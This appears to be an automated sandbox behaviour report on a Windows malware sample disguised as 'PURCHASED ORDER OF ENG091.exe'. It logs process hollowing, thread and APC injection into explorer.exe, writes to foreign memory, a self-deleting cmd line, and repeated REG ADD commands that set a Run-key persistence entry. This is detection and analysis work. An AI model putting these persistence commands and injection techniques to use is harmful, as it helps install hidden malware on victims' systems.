Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 4004

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 220000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\reg.exe base address: 370000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: E80000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: E80000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 270000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 960000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: E80000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 130000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: A60000

Writes to foreign memory regions

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 72D008
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DF9008
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9AB008

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"

Source: explorer.exe, 00000008.00000002.3366936645.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2175983009.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000008.00000000.2178228017.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3366936645.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3371369932.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.3366936645.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2175983009.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.3365608338.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2175448069.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000008.00000002.3366936645.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2175983009.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.2186408127.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074869572.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif VolumeInformation
